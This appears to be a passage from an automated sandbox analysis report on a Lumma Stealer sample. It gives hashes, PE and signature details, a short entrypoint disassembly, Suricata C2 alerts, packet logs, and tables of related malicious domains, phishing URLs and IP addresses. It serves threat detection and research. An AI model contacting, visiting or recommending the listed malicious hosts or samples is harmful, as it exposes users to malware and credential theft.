104.21.84.18	file.exe	Get hash	malicious	LummaC Stealer, onlyLogger	Browse	markuschop.fun/api
188.114.97.3	payment copy.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/0r21/
	BX7yRz7XqF.lnk	Get hash	malicious	PureLog Stealer, zgRAT	Browse	cloud.dellicon.top/1000/500/
	jKSjtQ8W7O.lnk	Get hash	malicious	PureLog Stealer, zgRAT	Browse	ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
	Shipping Documents_pdf.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/7vun/
	inject.exe	Get hash	malicious	RedLine, Xmrig	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	http://meta.case-page-appeal.eu/community-standard/208273899187123/	Get hash	malicious	Unknown	Browse	meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
	9q24V7OSys.exe	Get hash	malicious	FormBook	Browse	www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/mfctuvFf/download
	http://brawllstars.ru/	Get hash	malicious	HTMLPhisher	Browse	brawllstars.ru/
	http://aktiivasi-paylaterr.from-resmi.com/	Get hash	malicious	Unknown	Browse	aktiivasi-paylaterr.from-resmi.com/
104.21.17.174	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
snarlypagowo.site	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	104.21.18.193
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	104.21.18.193
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.18.193
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.18.193
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.183.74
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.183.74
	file.exe	Get hash	malicious	LummaC	Browse	104.21.18.193
treatynreit.site	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	172.67.184.196
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	104.21.84.18
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.184.196
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.84.18
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.84.18
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.184.196
	file.exe	Get hash	malicious	LummaC	Browse	104.21.84.18
absorptioniw.site	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	104.21.17.174
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	104.21.17.174
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.17.174
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.17.174
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.177.186
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.177.186
	file.exe	Get hash	malicious	LummaC	Browse	104.21.17.174
questionsmw.store	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	172.67.208.141
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	172.67.208.141
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.77.132
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.77.132
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.77.132
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.77.132
	file.exe	Get hash	malicious	LummaC	Browse	104.21.77.132
mysterisop.site	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	172.67.195.67
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	172.67.195.67
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.21.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.195.67
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.21.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.195.67
	file.exe	Get hash	malicious	LummaC	Browse	104.21.21.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	webNY0O9Sr.exe	Get hash	malicious	LummaC	Browse	172.67.209.193
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	35Mcl9DxHR.exe	Get hash	malicious	Unknown	Browse	172.67.178.253
CLOUDFLARENETUS	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	webNY0O9Sr.exe	Get hash	malicious	LummaC	Browse	172.67.209.193
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	35Mcl9DxHR.exe	Get hash	malicious	Unknown	Browse	172.67.178.253
CLOUDFLARENETUS	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	webNY0O9Sr.exe	Get hash	malicious	LummaC	Browse	172.67.209.193
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	35Mcl9DxHR.exe	Get hash	malicious	Unknown	Browse	172.67.178.253
CLOUDFLARENETUS	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	webNY0O9Sr.exe	Get hash	malicious	LummaC	Browse	172.67.209.193
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	35Mcl9DxHR.exe	Get hash	malicious	Unknown	Browse	172.67.178.253
CLOUDFLARENETUS	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	webNY0O9Sr.exe	Get hash	malicious	LummaC	Browse	172.67.209.193
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	172.67.209.193
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.16.12
	35Mcl9DxHR.exe	Get hash	malicious	Unknown	Browse	172.67.178.253

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.84.18 188.114.97.3 104.21.17.174 104.21.21.3 172.67.208.141 104.102.49.254 172.67.209.193 104.21.56.150 172.67.183.74
	webNY0O9Sr.exe	Get hash	malicious	LummaC	Browse	104.21.84.18 188.114.97.3 104.21.17.174 104.21.21.3 172.67.208.141 104.102.49.254 172.67.209.193 104.21.56.150 172.67.183.74
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.84.18 188.114.97.3 104.21.17.174 104.21.21.3 172.67.208.141 104.102.49.254 172.67.209.193 104.21.56.150 172.67.183.74
	EKAHephXb2.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.84.18 188.114.97.3 104.21.17.174 104.21.21.3 172.67.208.141 104.102.49.254 172.67.209.193 104.21.56.150 172.67.183.74
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.84.18 188.114.97.3 104.21.17.174 104.21.21.3 172.67.208.141 104.102.49.254 172.67.209.193 104.21.56.150 172.67.183.74
	7wN7BF7WfX.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.84.18 188.114.97.3 104.21.17.174 104.21.21.3 172.67.208.141 104.102.49.254 172.67.209.193 104.21.56.150 172.67.183.74
	BW4pTs1x3V.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.84.18 188.114.97.3 104.21.17.174 104.21.21.3 172.67.208.141 104.102.49.254 172.67.209.193 104.21.56.150 172.67.183.74
	IGAnbXyZVx.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.84.18 188.114.97.3 104.21.17.174 104.21.21.3 172.67.208.141 104.102.49.254 172.67.209.193 104.21.56.150 172.67.183.74
	N65c8rwdal.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.84.18 188.114.97.3 104.21.17.174 104.21.21.3 172.67.208.141 104.102.49.254 172.67.209.193 104.21.56.150 172.67.183.74

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.69038236497891
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	klFMCT64RF.exe
File size:	13'356'280 bytes
MD5:	0732fc7323424a121f9aa2a8d7001039
SHA1:	100f9cde038c5f5d31edd74d13a665c3f36553bb
SHA256:	6275fdc6cb613300c08ef09917a6dcd2da5eb1fef5e20bdd214fd9fefeafd8fb
SHA512:	56ab23658da1205af5ce4ae787d53997c7bea4ed7ed744777808c0c6fc750e9200e600fdc0f752efcc9fbec1f32b0c157f0d990b58029852fcdb691b1cc6bf3b
SSDEEP:	49152:GdQzN6Lq2bM+pgyyNMd47bgCn2EnKWNGwQ0udvePhunzUeNxFmjWyF077BpjTjyS:+QzN6Lq2Dgrl/EwhunDNjoKNVERY1cv6
TLSH:	93D62902FE9784F1D9434435809BA36F57389E058B39DB8BEB647E69E8372921D3B10D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........................?.......................@..........................p.......V....@................................

File Icon


Icon Hash:	adaeb797f34b2b31

Static PE Info

General

Entrypoint:	0x46d710
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	4f2f006e2ecf7172ad368f8289dc96c1

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	09/09/2024 11:06:13 09/09/2025 11:06:12
Subject Chain	CN="Guizhou Sixuanda Technology Co., Ltd.", O="Guizhou Sixuanda Technology Co., Ltd.", L=Guiyang, S=Guizhou, C=CN, SERIALNUMBER=91520100MA6DNNXK11, OID.1.3.6.1.4.1.311.60.2.1.1=Guiyang, OID.1.3.6.1.4.1.311.60.2.1.2=Guizhou, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
Version:	3
Thumbprint MD5:	62A1343435FC5131E11FA8C871BB3A1B
Thumbprint SHA-1:	A3AFF46C5F8E2A1F750C570698B864E75553E61F
Thumbprint SHA-256:	87D45B86DFCC84C5EF8338026C26F34935DBAA383A7DD583F48675AF77C957A4
Serial:	332576FE101609502C23F70055B4A3BE

Entrypoint Preview

Instruction
jmp 00007F674D1064F0h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov dword ptr [esp], eax
mov dword ptr [esp+04h], ecx
call 00007F674D0EAA46h
mov eax, dword ptr [esp+08h]
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
sub esp, 08h
mov ecx, dword ptr [esp+0Ch]
mov edx, dword ptr [ecx]
mov eax, esp
mov dword ptr [edx+04h], eax
sub eax, 00010000h
mov dword ptr [edx], eax
add eax, 00000BA0h
mov dword ptr [edx+08h], eax
mov dword ptr [edx+0Ch], eax
lea edi, dword ptr [ecx+34h]
mov dword ptr [edx+18h], ecx
mov dword ptr [edi], edx
mov dword ptr [esp+04h], edi
call 00007F674D108944h
cld
call 00007F674D1079DEh
call 00007F674D106619h
add esp, 08h
ret
jmp 00007F674D1087F0h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ebx, dword ptr [esp+04h]
mov ebp, esp
mov dword ptr fs:[00000034h], 00000000h
mov ecx, dword ptr [ebx+04h]
cmp ecx, 00000000h
je 00007F674D1087F1h
mov eax, ecx
shl eax, 02h
sub esp, eax
mov edi, esp
mov esi, dword ptr [ebx+08h]
cld
rep movsd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcbd000	0x45e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcf8000	0xef2d	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xcba400	0x28f8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xcbe000	0x38c1e	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc1b3e0	0xb8	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3fded8	0x3fe000	c8cb492a16f560ec857700281698e55a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3ff000	0x81a8e8	0x81aa00	00c5e915d806647f1c27755c17b46bc0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc1a000	0xa25a0	0x59000	031c9ce2c5b068ca7d280e65798b29d3	False	0.3769970154494382	data	5.739332180485546	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xcbd000	0x45e	0x600	77c0b439f7fe015ec0eb38b7a8b0cc4a	False	0.36328125	data	3.9185510513662685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0xcbe000	0x38c1e	0x38e00	973b52aeecd5df913b6c94d8b2a26a61	False	0.5799836881868132	data	6.684616044418775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0xcf7000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0xcf8000	0xef2d	0xf000	ca01964a75b3a426f8bc110e1427201a	False	0.029134114583333332	data	3.853289415354194	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xcf8160	0xe8ac	Device independent bitmap graphic, 225 x 450 x 8, image size 51300, resolution 26574 x 26574 px/m, 256 important colors			0.01606675172923242
RT_GROUP_ICON	0xd06a0c	0x14	data			1.15
RT_VERSION	0xd06a20	0x390	data	English	United States	0.44298245614035087
RT_MANIFEST	0xd06db0	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-02T15:10:57.427135+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49716	188.114.97.3	443	TCP
2024-10-02T15:10:57.427135+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49716	188.114.97.3	443	TCP
2024-10-02T15:10:58.378602+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49717	172.67.208.141	443	TCP
2024-10-02T15:10:58.378602+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49717	172.67.208.141	443	TCP
2024-10-02T15:10:59.368455+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49718	188.114.97.3	443	TCP
2024-10-02T15:10:59.368455+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49718	188.114.97.3	443	TCP
2024-10-02T15:11:00.404803+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49719	104.21.56.150	443	TCP
2024-10-02T15:11:00.404803+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49719	104.21.56.150	443	TCP
2024-10-02T15:11:01.532459+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49720	104.21.84.18	443	TCP
2024-10-02T15:11:01.532459+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49720	104.21.84.18	443	TCP
2024-10-02T15:11:02.551580+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49721	172.67.183.74	443	TCP
2024-10-02T15:11:02.551580+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49721	172.67.183.74	443	TCP
2024-10-02T15:11:03.859116+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49722	104.21.21.3	443	TCP
2024-10-02T15:11:03.859116+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49722	104.21.21.3	443	TCP
2024-10-02T15:11:05.776615+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49723	104.21.17.174	443	TCP
2024-10-02T15:11:05.776615+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49723	104.21.17.174	443	TCP
2024-10-02T15:11:08.192824+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49725	172.67.209.193	443	TCP
2024-10-02T15:11:08.192824+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49725	172.67.209.193	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 15:10:56.311966896 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:56.312010050 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:56.312104940 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:56.314587116 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:56.314601898 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:56.798439980 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:56.798572063 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:56.852180004 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:56.852216005 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:56.853153944 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:56.902295113 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:56.986742973 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:56.986965895 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:56.987099886 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:57.426985025 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:57.427098036 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:57.427633047 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:57.428739071 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:57.428761959 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:57.428776979 CEST	49716	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:57.428781033 CEST	443	49716	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:57.447402954 CEST	49717	443	192.168.2.5	172.67.208.141
Oct 2, 2024 15:10:57.447484016 CEST	443	49717	172.67.208.141	192.168.2.5
Oct 2, 2024 15:10:57.447578907 CEST	49717	443	192.168.2.5	172.67.208.141
Oct 2, 2024 15:10:57.447906971 CEST	49717	443	192.168.2.5	172.67.208.141
Oct 2, 2024 15:10:57.447937012 CEST	443	49717	172.67.208.141	192.168.2.5
Oct 2, 2024 15:10:57.934117079 CEST	443	49717	172.67.208.141	192.168.2.5
Oct 2, 2024 15:10:57.934261084 CEST	49717	443	192.168.2.5	172.67.208.141
Oct 2, 2024 15:10:57.936170101 CEST	49717	443	192.168.2.5	172.67.208.141
Oct 2, 2024 15:10:57.936196089 CEST	443	49717	172.67.208.141	192.168.2.5
Oct 2, 2024 15:10:57.936547041 CEST	443	49717	172.67.208.141	192.168.2.5
Oct 2, 2024 15:10:57.937700033 CEST	49717	443	192.168.2.5	172.67.208.141
Oct 2, 2024 15:10:57.937727928 CEST	49717	443	192.168.2.5	172.67.208.141
Oct 2, 2024 15:10:57.937781096 CEST	443	49717	172.67.208.141	192.168.2.5
Oct 2, 2024 15:10:58.378577948 CEST	443	49717	172.67.208.141	192.168.2.5
Oct 2, 2024 15:10:58.378691912 CEST	443	49717	172.67.208.141	192.168.2.5
Oct 2, 2024 15:10:58.378932953 CEST	49717	443	192.168.2.5	172.67.208.141
Oct 2, 2024 15:10:58.379106998 CEST	49717	443	192.168.2.5	172.67.208.141
Oct 2, 2024 15:10:58.379149914 CEST	443	49717	172.67.208.141	192.168.2.5
Oct 2, 2024 15:10:58.379185915 CEST	49717	443	192.168.2.5	172.67.208.141
Oct 2, 2024 15:10:58.379203081 CEST	443	49717	172.67.208.141	192.168.2.5
Oct 2, 2024 15:10:58.403419018 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:58.403484106 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:58.403625011 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:58.403922081 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:58.403949976 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:58.887329102 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:58.887491941 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:58.889193058 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:58.889215946 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:58.889621019 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:58.891030073 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:58.891064882 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:58.891139030 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:59.368314028 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:59.368422031 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:59.368489027 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:59.371784925 CEST	49718	443	192.168.2.5	188.114.97.3
Oct 2, 2024 15:10:59.371807098 CEST	443	49718	188.114.97.3	192.168.2.5
Oct 2, 2024 15:10:59.430427074 CEST	49719	443	192.168.2.5	104.21.56.150
Oct 2, 2024 15:10:59.430478096 CEST	443	49719	104.21.56.150	192.168.2.5
Oct 2, 2024 15:10:59.430567026 CEST	49719	443	192.168.2.5	104.21.56.150
Oct 2, 2024 15:10:59.434533119 CEST	49719	443	192.168.2.5	104.21.56.150
Oct 2, 2024 15:10:59.434546947 CEST	443	49719	104.21.56.150	192.168.2.5
Oct 2, 2024 15:10:59.921392918 CEST	443	49719	104.21.56.150	192.168.2.5
Oct 2, 2024 15:10:59.921528101 CEST	49719	443	192.168.2.5	104.21.56.150
